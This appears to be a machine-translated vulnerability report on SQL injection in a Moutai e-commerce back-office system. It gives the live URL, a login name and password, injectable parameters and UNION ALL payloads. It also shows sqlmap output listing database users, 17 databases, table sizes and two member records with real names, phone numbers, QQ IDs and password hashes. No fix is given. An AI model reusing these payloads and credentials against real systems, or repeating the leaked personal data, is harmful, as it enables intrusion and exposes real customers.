Moutai e-commerce has multiple SQL Injection packages in the background (DBA permission/17 databases/47W members)
Note:
Http://www.emaotai.cn: 90/zyd/
Account: wanglei
Password 123456
Get submit method SQL injection point:
Http://www.emaotai.cn: 90/zyd/Sales/XsdEdit. aspx? Pjbh = 111000100020 & ReturnPage = Xsmxz. aspx & op = 2
http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18
Post submitted injection points (you can find them by entering single quotes in the search box ):
There are still many similar problems. Check the problem yourself.
http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
Example
Payload: ReturnPage = Xsflz. aspx & spbh =-4455 'Union all select char (113) + CHAR (1
22)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:33:34] [INFO] fetching database users[09:33:35] [INFO] the SQL query used returns 12 entries[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##[09:33:36] [INFO] retrieved: actuser[09:33:36] [INFO] retrieved: bmDev[09:33:36] [INFO] retrieved: dev[09:33:36] [INFO] retrieved: distributor_admin[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: moutaiwssc[09:33:38] [INFO] retrieved: mysys[09:33:38] [INFO] retrieved: sa[09:33:38] [INFO] retrieved: taxreaderdatabase management system users [11]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] actuser[*] bmDev[*] dev[*] distributor_admin[*] hishop_pj[*] moutaiwssc[*] mysys[*] sa[*] taxreader
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:31:54] [INFO] testing Microsoft SQL Server[09:31:54] [INFO] confirming Microsoft SQL Server[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:31:55] [INFO] fetching database names[09:31:55] [INFO] the SQL query used returns 18 entries[09:31:56] [INFO] retrieved: distribution[09:31:56] [INFO] retrieved: DrpEco[09:31:56] [INFO] retrieved: drpecosdl[09:31:56] [INFO] retrieved: DrpEcoTest[09:31:57] [INFO] retrieved: eAct[09:31:57] [INFO] retrieved: eActTest[09:31:57] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_logs[09:31:58] [INFO] retrieved: hishop[09:31:59] [INFO] retrieved: master[09:31:59] [INFO] retrieved: model[09:31:59] [INFO] retrieved: moutai[09:31:59] [INFO] retrieved: moutaitest[09:32:00] [INFO] retrieved: msdb[09:32:00] [INFO] retrieved: ReportServer[09:32:00] [INFO] retrieved: ReportServerTempDB[09:32:01] [INFO] retrieved: tempdbavailable databases [17]:[*] distribution[*] DrpEco[*] drpecosdl[*] DrpEcoTest[*] eAct[*] eActTest[*] emaotai_act_test[*] emaotai_logs[*] hishop[*] master[*] model[*] moutai[*] moutaitest[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: hishop+------------------------------------+---------+| Table | Entries |+------------------------------------+---------+| dbo.Hishop_CouponItems | 2473863 || dbo.vw_Hishop_CouponInfo | 2473863 || dbo.aspnet_Members | 476302 || dbo.vw_aspnet_Members | 476299 || dbo.Hishop_MessageContent | 104862 || dbo.Hishop_MemberMessageBox | 104674 || dbo.vw_Hishop_MemberMessageBox | 104670 || dbo.aspnet_UsersInRoles | 82703 || dbo.aspnet_UsersInRoles | 82703 || dbo.Hishop_OrderItems | 38235 || dbo.vw_Hishop_SaleDetails | 38227 || dbo.vw_Hishop_OrderItem | 20446 || dbo.Hishop_OrderOptions | 18255 || dbo.Hishop_ManagerMessageBox | 14698 || dbo.vw_Hishop_ManagerMessageBox | 14695 || dbo.Hishop_PointDetails | 14127 || dbo.xupiaoOrder | 12710 || dbo.Hishop_UserShippingAddresses | 12014 || dbo.Hishop_Logs | 10193 || dbo.Hishop_OrderDebitNote | 8515 || dbo.vw_Hishop_OrderDebitNote | 8509 || dbo.Hishop_SMSLog | 7484 || dbo.Hishop_BookingOrderSend | 4447 || dbo.Hishop_PhotoGallery | 3791 || dbo.Hishop_Favorite | 2395 || dbo.Hishop_ProductConsultations | 1414 || dbo.vw_Hishop_ProductConsultations | 1414 || dbo.t_sys_Columdef | 1261 || dbo.Hishop_ProductReviews | 1127 || dbo.vw_Hishop_ProductReviews | 1127 || dbo.HiShop_PayMentDetail | 656 || dbo.Hishop_PrivilegeInRoles | 541 || dbo.Hishop_SKUMemberPrice | 412 || dbo.Hishop_Products | 375 || dbo.Hishop_SKUs | 375 || dbo.vw_Hishop_BrowseProductList | 375 || dbo.vw_Hishop_ProductSkuList | 375 || dbo.Hishop_OrderRefund | 371 || dbo.vw_Hishop_OrderRefund | 371 || dbo.Hishop_ProductTag | 354 || dbo.Vshop_RelatedTopicProducts | 202 || dbo.Hishop_InpourRequest | 198 || dbo.t_sys_tabledef | 191 || dbo.Hishop_BalanceDetails | 175 || dbo.Hishop_LeaveCommentReplys | 131 || dbo.Hishop_LeaveComments | 127 || dbo.t_cx_sql | 114 || dbo.Hishop_ShoppingCarts | 88 || dbo.t_sys_StoreProc | 87 || dbo.aspnet_Managers | 80 || dbo.Vshop_HomeProducts | 69 || dbo.vw_aspnet_Managers | 69 || dbo.Hishop_Articles | 65 || dbo.vw_Hishop_Articles | 65 || dbo.Hishop_OrderReturns | 56 || dbo.vw_Hishop_OrderReturns | 56 || dbo.vshop_Reply | 47 || dbo.Hishop_PromotionMemberGrades | 40 || dbo.Hishop_ProductTypeBrands | 38 || dbo.Hishop_VoteItems | 38 || dbo.tmp_orders | 38 || dbo.Vshop_Topics | 32 || dbo.Hishop_Affiche | 28 || dbo.Hishop_Categories | 28 || dbo.Hishop_Hotkeywords | 28 || dbo.Hishop_Helps | 26 || dbo.Hishop_OrderReplace | 26 || dbo.vw_Hishop_Helps | 26 || dbo.vw_Hishop_OrderReplace | 26 || dbo.Hishop_PhotoCategories | 23 || dbo.Hishop_BundlingProductItems | 21 || dbo.Hishop_OrderSendNote | 20 || dbo.Hishop_OrderSendNote | 20 || dbo.vw_Hishop_OrderSendNote | 20 || dbo.Hishop_CountDown | 19 || dbo.vw_Hishop_CountDown | 19 || dbo.vshop_Menu | 18 || dbo.Hishop_BrandCategories | 17 || dbo.Hishop_CouponsLog | 14 || dbo.Hishop_CouponsLog | 14 || dbo.Hishop_MessageTemplates | 13 || dbo.Hishop_Tags | 13 || dbo.Hishop_ExpressTemplates | 11 || dbo.Hishop_RelatedProducts | 11 || dbo.aspnet_Roles | 10 || dbo.Hishop_Promotions | 10 || dbo.Hishop_BundlingProducts | 9 || dbo.vshop_Message | 9 || dbo.Vshop_PrizeRecord | 9 || dbo.vw_Hishop_BundlingProducts | 9 || dbo.Hishop_Votes | 8 || dbo.Hishop_Banner | 7 || dbo.Hishop_ActivityProduct | 6 || dbo.Hishop_AttributeValues | 6 || dbo.Hishop_FriendlyLinks | 6 || dbo.Hishop_HelpCategories | 6 || dbo.vshop_ActivitySignUp | 6 || dbo.Hishop_ActivityManage | 5 || dbo.Hishop_ArticleCategories | 5 || dbo.Hishop_ProductTypes | 5 || dbo.aspnet_MemberGrades | 4 || dbo.Hishop_PaymentTypes | 4 || dbo.Hishop_TemplateRelatedShipping | 4 || dbo.Hishop_MemberClientSet | 3 || dbo.Hishop_RelatedArticsProducts | 3 || dbo.CustomMade_WebPoints | 2 || dbo.Hishop_Attributes | 2 || dbo.Hishop_OrderLookupItems | 2 || dbo.Hishop_ShippingTypes | 2 || dbo.Hishop_GroupBuyCondition | 1 || dbo.Hishop_GroupBuyCondition | 1 || dbo.Hishop_MessageWhiteList | 1 || dbo.Hishop_OrderLookupLists | 1 || dbo.Hishop_ProductBooking | 1 || dbo.Hishop_Shippers | 1 || dbo.Hishop_ShippingTemplates | 1 || dbo.Hishop_TableLock | 1 || dbo.t_sys_project | 1 || dbo.vw_Hishop_GroupBuy | 1 |+------------------------------------+---------+
Aspnet_Members is a member table with 476302 data entries. Check the first two data entries.
Payload: ReturnPage = Xsflz. aspx & spbh =-4455 'Union all select char (113) + CHAR (1
22) + CHAR (118) + CHAR (120) + CHAR (113) + CHAR (66) + CHAR (108) + CHAR (78) + CHAR (99) + CHAR (104) + CHAR (87) + CHAR (106) + CHAR (74) + CHAR (76) + CHAR (83) + CHAR (113) + CHAR (98) + CHAR (107) + CHAR (118) + CHAR (113) ----- [09:55:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP. NET 4.0.30319, ASP. NETback-end DBMS: microsoft SQL Server 2008 [09:55:19] [INFO] fetching columns for table 'aspnet _ Members 'in database 'hishop' [09:55:19] [INFO] the SQL query used returns 31 entries [09:55:19] [INFO] fetching entries for table 'aspnet _ Members 'in database 'hishop' [09:55:19] [INFO] fetching number of distinct values for column 'qq' [09:55:19] [INFO] fetching number of distinct values for column 'msn '[09:55:19] [INFO] fetching number of distinct values for column 'openid' [09:55:19] [INFO] fetching number of distinct values for column 'points '[09:55:19] [INFO] fetching number of distinct values for column 'typeid' [09:55:19] [INFO] fetching number of distinct values for column 'address' [09:55:19] [INFO] fetching number of distinct values for column 'balance '[09:55:19] [INFO] fetching number of distinct values for column 'gradeid' [09:55:19] [INFO] fetching number of distinct values for column 'zipcode '[09:55:19] [INFO] fetching number of distinct values for column 'countbuy' [09:55:19] [INFO] fetching number of distinct values for column 'realname' [09:55:19] [INFO] fetching number of distinct values for column 'regionid' [09:55:19] [INFO] fetching number of distinct values for column 'telphone' [09:55:19] [INFO] fetching number of distinct values for column 'wangwang '[09:55:19] [INFO] fetching number of distinct values for column 'Cellphone' [09:55:19] [INFO] fetching number of distinct values for column 'sessionid' [09:55:19] [INFO] fetching number of distinct values for column 'userid _ drp' [09:55:19] [INFO] fetching number of distinct values for column 'Expenditure '[09:55:19] [INFO] fetching number of distinct values for column 'ordernumber' [09:55:19] [INFO] fetching number of distinct values for column 'topregionid' [09:55:19] [INFO] fetching number of distinct values for column 'vipcarddate' [09:55:19] [INFO] fetching number of distinct values for column 'isopenbalance '[09:55:19] [INFO] fetching number of distinct values for column 'vipcardnumber' [09:55:19] [INFO] fetching number of distinct values for column 'referraluserid' [09:55:19] [INFO] fetching number of distinct values for column 'requestbalance '[09:55:19] [INFO] fetching number of distinct values for column 'sessionendtime' [09:55:19] [INFO] fetching number of distinct values for column 'recordstatus _ drp' [09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordsalt' [09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordformat' [09:55:19] [WARNING] no proper character column provided (with unique values ). it won't be possible to retrieve all rows [09:55:20] [INFO] analyzing table dump for possible password hashesDatabase: hishopTable: aspnet_Members [2 entries] + -------- + --------- + ---------- + ----------- + upper + lower + upper + --------- + -------- + --------- + ---------- ---------- + ------------- + response + ----------- + response + | typeid | OpenId | GradeId | RegionId | SessionId | region | TopRegionId | referralid | QQ | MSN | Points | Zipcode | Address | Balance | Wangwang | CountBuy | RealName | TelPhone | CellPhone | VipCardDate | OrderNumber | Expenditure | VipCardNumber | IsOpenBalance | SessionEndTime | RequestBalance | Balance | | TradePasswordFormat | + -------- + --------- + ---------- + ----------- + upper + lower + upper + --------- + -------- + --------- + ---------- + ------------ + ------------- + hour + --------------- + ---------------- + ------------------ + hour + | 1 | NULL | 1 | 897 | NULL | 20141012000065 | 883 | NULL | 928095509 | | 0 | NULL | | 0.00 | NULL | Yang zhiguang | NULL | 13103529668 | 10 122014 PM | 0 | 0.00 | NULL | 1 | NULL | 0.00 | 3 | CRJAUboLeduKT + mKpKLZxg = | 1 | | 1 | NULL | 1 | 3139 | NULL | 20141022000012 | 3130 | NULL | 233629822 | | 0 | NULL | | 0.00 | NULL | luoping | NULL | 13980951791 | 10 22 2014 AM | 0 | 0.00 | NULL | 0 | NULL | 0.00 | 2 | f0uaf1ciax6tjpaljitwq = | 1 | + -------- + --------- + ---------- + ----------- + response + --------- + -------- + --------- + ---------- + ------------- + response + ------------- + --------------- + ---------------- + ------------------ + ---------------------------------- + ---------------------------
Solution:
You are more professional than me.